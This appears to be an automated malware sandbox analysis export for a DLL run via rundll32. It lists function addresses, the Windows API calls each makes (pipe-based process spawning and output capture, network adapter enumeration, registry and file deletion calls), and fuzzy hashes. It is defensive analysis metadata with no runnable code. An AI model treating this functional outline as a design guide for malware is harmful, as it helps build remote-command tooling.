Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ef69e3b8279a3df4421783dbe62d74182787a1ea8c2965100cf336d0c126f3
Instruction ID: a985ec8887e4fe7c2043975b9aa80c707edde3b3dcc903df90397c71db03276e
Opcode Fuzzy Hash: 97ef69e3b8279a3df4421783dbe62d74182787a1ea8c2965100cf336d0c126f3
Instruction Fuzzy Hash: 189106A2A1DF8695EA50DB20E4513AAB362FFC9394F901035E68E436A9DF3CF545CB40

Function 00007FFB1E863A24 Relevance: 9.1, APIs: 6, Instructions: 110
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFB1E863A6D

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b6b8473d3cfbd10d9387e75cea738af656ed7c38e007c94938ca2057f07301e4
Instruction ID: 2c21aaf38d4375db3a64aa631d820cff5cdb20c325eb216906da15025063964c
Opcode Fuzzy Hash: b6b8473d3cfbd10d9387e75cea738af656ed7c38e007c94938ca2057f07301e4
Instruction Fuzzy Hash: 6851FE75A0CE4182E6509B29F45036AB761FBC57B4F100235EA9D47BE8DF7DE485CB40

Function 00007FFB1E863868 Relevance: 7.6, APIs: 5, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541ab72dd635451082995b8613512323543e8198801155409134fa54fb96020a
Instruction ID: 885560a8a6f757daf64e62a1116eb70e8a360f9bc040e2aa847cf7517986a039
Opcode Fuzzy Hash: 541ab72dd635451082995b8613512323543e8198801155409134fa54fb96020a
Instruction Fuzzy Hash: 7E4107E0D0CE4386FA609B34E8053796293BF89379F100635E5AE966E6DF3CF4499A01

Function 00007FFB1E86B0C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlpNtOpenKey.NTDLL ref: 00007FFB1E86B136

Strings

0, xrefs: 00007FFB1E86B108
@, xrefs: 00007FFB1E86B110

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenRtlp
String ID: 0$@
API String ID: 2893929204-1545510068
Opcode ID: 99056d26cda8ca3d4e3c89b7d0603f3ace301f699dcb2688138bdbb85deba410
Instruction ID: 425dbfb6f62488dc255f86ebb0a38bcb6140d7aa2514303785d7f7a5b9e9f3f2
Opcode Fuzzy Hash: 99056d26cda8ca3d4e3c89b7d0603f3ace301f699dcb2688138bdbb85deba410
Instruction Fuzzy Hash: D4018FB2618A8182D760CF20E44039BBBA4F7C43A8F904134E6CE82A69DF3CE645CF40

Function 00007FFB1E86B400 Relevance: 4.5, APIs: 3, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00007FFB1E86B498
CloseHandle.KERNEL32 ref: 00007FFB1E86B4AB
CloseHandle.KERNEL32 ref: 00007FFB1E86B4B6

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID:
API String ID: 2922976086-0
Opcode ID: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
Instruction ID: 8be75cbced9050d8a65f964fab838bbeee4bd552cfaf01f9aa1604115304e64a
Opcode Fuzzy Hash: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
Instruction Fuzzy Hash: D8112B72A0CA8187E7A0CB64F45476BB7A1F7C8364F504135E68D82AA8DF7CE549CF00

Function 00007FFB1E8689D4 Relevance: 4.5, APIs: 3, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstVolumeW.KERNELBASE ref: 00007FFB1E868A0E
GetVolumeInformationW.KERNELBASE ref: 00007FFB1E868A62
FindVolumeClose.KERNEL32 ref: 00007FFB1E868A71

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: Volume$Find$CloseFirstInformation
String ID:
API String ID: 586543143-0
Opcode ID: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
Instruction ID: a0fb4abf9606313877a5b80fd3c689c0db1613ea825a2609a067261900fb4f52
Opcode Fuzzy Hash: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
Instruction Fuzzy Hash: 921103B5A2CE4196E760DB20F4843AAB371F7C4360F540236E69D426E8DF7CE549CB00

Function 00007FFB1E863C2C Relevance: 4.5, APIs: 3, Instructions: 15
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32 ref: 00007FFB1E863C49
ReleaseMutex.KERNEL32 ref: 00007FFB1E863C60
FindCloseChangeNotification.KERNELBASE ref: 00007FFB1E863C6D

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseEventFindMutexNotificationRelease
String ID:
API String ID: 241605031-0
Opcode ID: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
Instruction ID: 96a543d2c8db114f885dbfa00a7e0ef110916cc6d99da9d92c627f62031c674f
Opcode Fuzzy Hash: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
Instruction Fuzzy Hash: FDF052A8D1CE42C2E6909B24E9583352762FF8476CF400135D94EA2270CF7CB98ACA15

Function 00007FFB1E86CF14 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccae81713694e4cd90fb5a0d31536c55cbee103d7af4e1c7cb79f72cbb0b4ef8
Instruction ID: 3bee21af479dca2495484dd0e3275b21ba432cc97b6f04f0c8c3a1946523c51c
Opcode Fuzzy Hash: ccae81713694e4cd90fb5a0d31536c55cbee103d7af4e1c7cb79f72cbb0b4ef8
Instruction Fuzzy Hash: 35712AB191CE8681EB50DB24F4503AAB762FBC8394F501136E68D47AA9DF7CF585CB40

Function 00007FFB1E8688F8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

RtlFormatCurrentUserKeyPath.NTDLL ref: 00007FFB1E86896F

Part of subcall function 00007FFB1E867B40: NtFreeVirtualMemory.NTDLL ref: 00007FFB1E867B71

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: CurrentFormatFreeMemoryPathUserVirtual
String ID:
API String ID: 2593304397-0
Opcode ID: 86c1636f8196c67e737ffc1610daef22f7835d658f7e32d4e91e4803e8f92b83
Instruction ID: 4f95dd7d2d45f3f9a28cfccc98eec7969ba6e8285a04147e1bfa38f750328f3f
Opcode Fuzzy Hash: 86c1636f8196c67e737ffc1610daef22f7835d658f7e32d4e91e4803e8f92b83
Instruction Fuzzy Hash: 6821D3E2A2CD4391EB609B31E45137AA362FF9C3A8F504535E6CE825A9EF2CF505C701

Function 00007FFB1E86841C Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB1E86AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

GetModuleFileNameW.KERNEL32 ref: 00007FFB1E868462

Part of subcall function 00007FFB1E867B40: NtFreeVirtualMemory.NTDLL ref: 00007FFB1E867B71

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateFileFreeModuleName
String ID:
API String ID: 1369786923-0
Opcode ID: 142c038aa201e52e575b6126af4ec832a872663e7ba2b392c7bc3b98985ecee4
Instruction ID: 3dee2590d022ed0d9cdef21077ca33f3aa699e5f3464691021cf35a591a031a2
Opcode Fuzzy Hash: 142c038aa201e52e575b6126af4ec832a872663e7ba2b392c7bc3b98985ecee4
Instruction Fuzzy Hash: 7A21E5B252CA8187E770DB25E19472AB7A1F788798F001135F6CD42A98DF7CE544CF44

Function 00007FFB1E863194 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00007FFB1E863224

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 09100f0300395ae6f5b584f03befab42788e05347f36807b9dbcae9cb551cf0d
Instruction ID: 08079928ec6debd972b9b545c8476a1fa3fb1e6e5e4abcbbfd344bdc986a3100
Opcode Fuzzy Hash: 09100f0300395ae6f5b584f03befab42788e05347f36807b9dbcae9cb551cf0d
Instruction Fuzzy Hash: 7A112E72A2CA8196D761DB20E54036AB3A2FBCC754F904135E68D42BA8DF3CE645CF00

Function 00007FFB1E867414 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE ref: 00007FFB1E867428

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
Instruction ID: 9572d67f715c60cd58d5a4348aebf8d729ad9ae885d790270af0a02e87fb450e
Opcode Fuzzy Hash: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
Instruction Fuzzy Hash: 6CE092B1E3CA82C7E3A0AB34E94833A6A51EB89360F500630E9DA811C4EF2DF445DB00

Function 00007FFB1E868A94 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32 ref: 00007FFB1E868AB4

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: DirectorySystem
String ID:
API String ID: 2188284642-0
Opcode ID: dfb4a1fa39bbd87ebdbe77a0f586fcf263206d1ff544b9d7c1b54ce86c222524
Instruction ID: 21df033dac9d56172a5f484c4d3e0efbc21ce4587244495013d9a82f3d00cb6b
Opcode Fuzzy Hash: dfb4a1fa39bbd87ebdbe77a0f586fcf263206d1ff544b9d7c1b54ce86c222524
Instruction Fuzzy Hash: 9AE01292B5898282E760A730D4513BB6262FBD8314FD04231A59ED65E5DF2CFB06C700

Function 00007FFB1E866298 Relevance: 1.3, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB1E86AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

MultiByteToWideChar.KERNEL32 ref: 00007FFB1E866317

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateByteCharMemoryMultiVirtualWide
String ID:
API String ID: 2538853753-0
Opcode ID: a906b0fc521b46abc145193926863fdc03b59511d6abb81f8d8ae146be955827
Instruction ID: 6ae47f06cfd4b91c3761f8cf702aa22680877d3bb84b26a952d5c3be5e2e6e37
Opcode Fuzzy Hash: a906b0fc521b46abc145193926863fdc03b59511d6abb81f8d8ae146be955827
Instruction Fuzzy Hash: 9A01C576A28A858AD790DB25E48175EBBE1F7C87A4F105035FA8B83B58DF3CE5458B00

Non-executed Functions

Function 00007FFB1E861030 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 206pipefileprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32 ref: 00007FFB1E8610FF
SetHandleInformation.KERNEL32 ref: 00007FFB1E861119
CreatePipe.KERNEL32 ref: 00007FFB1E86113A
SetHandleInformation.KERNEL32 ref: 00007FFB1E861154
CreatePipe.KERNEL32 ref: 00007FFB1E861175
SetHandleInformation.KERNEL32 ref: 00007FFB1E86118F
CreateProcessW.KERNEL32 ref: 00007FFB1E861251

Part of subcall function 00007FFB1E86AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

PeekNamedPipe.KERNEL32 ref: 00007FFB1E861300
ReadFile.KERNEL32 ref: 00007FFB1E86135C
PeekNamedPipe.KERNEL32 ref: 00007FFB1E8613B0
ReadFile.KERNEL32 ref: 00007FFB1E86140C
GetExitCodeProcess.KERNEL32 ref: 00007FFB1E861445
TerminateProcess.KERNEL32 ref: 00007FFB1E861476
CloseHandle.KERNEL32 ref: 00007FFB1E861484

Part of subcall function 00007FFB1E86C934: NtDelayExecution.NTDLL ref: 00007FFB1E86C956

CloseHandle.KERNEL32 ref: 00007FFB1E861492
CloseHandle.KERNEL32 ref: 00007FFB1E8614A0
CloseHandle.KERNEL32 ref: 00007FFB1E8614AE

Part of subcall function 00007FFB1E867B40: NtFreeVirtualMemory.NTDLL ref: 00007FFB1E867B71

Strings

h, xrefs: 00007FFB1E861195

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
String ID: h
API String ID: 30365702-2439710439
Opcode ID: f6810e4c68f11a3764d1144e4f6a2e2f8f72179d48d86f12ad25ea2283f23b77
Instruction ID: 003a3532b161ace862cdeec5de581584f24497bfb80c1146f893d491d6856393
Opcode Fuzzy Hash: f6810e4c68f11a3764d1144e4f6a2e2f8f72179d48d86f12ad25ea2283f23b77
Instruction Fuzzy Hash: E6C1F376A0CBC18AE760CB25E4547ABB7A2F7C8754F404125E68D83A69CF7CE449CF40

Function 00007FFB1E867FA8 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB1E86AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1E86AD6A

GetAdaptersInfo.IPHLPAPI ref: 00007FFB1E867FF4
GetAdaptersInfo.IPHLPAPI ref: 00007FFB1E86802B
wsprintfA.USER32 ref: 00007FFB1E868074
wsprintfA.USER32 ref: 00007FFB1E86815F
wsprintfA.USER32 ref: 00007FFB1E8681C3

Strings

o, xrefs: 00007FFB1E868006

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
String ID: o
API String ID: 2074107575-252678980
Opcode ID: 5af0839b78c35f7c4fda2989d8c727d21a78acf1e9bf26bd2094f79093803cc2
Instruction ID: 008123d218d584d5338f884acc08cceca81b9e06ae33cfdef2eaec06df179a03
Opcode Fuzzy Hash: 5af0839b78c35f7c4fda2989d8c727d21a78acf1e9bf26bd2094f79093803cc2
Instruction Fuzzy Hash: 0EB1ECB6A1DF8186DA60CB25F45036AB7A1FB8C794F500535EA8E83B69DF3CE545CB00

Function 00007FFB1E86745C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 31nativefileCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 00007FFB1E8674A2
NtOpenFile.NTDLL ref: 00007FFB1E8674D6
NtClose.NTDLL ref: 00007FFB1E8674F0

Strings

0, xrefs: 00007FFB1E86748D
, xrefs: 00007FFB1E8674B2
@, xrefs: 00007FFB1E867482

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseFileInitOpenStringUnicode
String ID: $0$@
API String ID: 3719522541-2347541974
Opcode ID: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
Instruction ID: 1542d5adb8e2bf5395d91c9d85498a303d5b21d40347979c32836c14d65dcfbf
Opcode Fuzzy Hash: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
Instruction Fuzzy Hash: E401EDB6518A8186E750DF20E45439BBB61F7C47A4F501035E2CE43AA8DF7DE98ACF40

Function 00007FFB1E867694 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 00007FFB1E8676D1
NtDeleteFile.NTDLL ref: 00007FFB1E8676E6

Strings

@, xrefs: 00007FFB1E8676B4
0, xrefs: 00007FFB1E8676BC

Memory Dump Source

Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true

Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFileInitStringUnicode
String ID: 0$@
API String ID: 3559453722-1545510068
Opcode ID: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
Instruction ID: 57a6e07e03fff23ffd3ed69a36306335f77c7c098019ace4a68b745ca29c00aa
Opcode Fuzzy Hash: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
Instruction Fuzzy Hash: 04F01DB261898286D7209F10E45435FBB65FB84398F500125E2CE46AA8DB7DE659CF40

Function 00007FFB1E861A08 Relevance: 6.1, APIs: 4, Instructions: 113fileCOMMON

Download Yara Rule

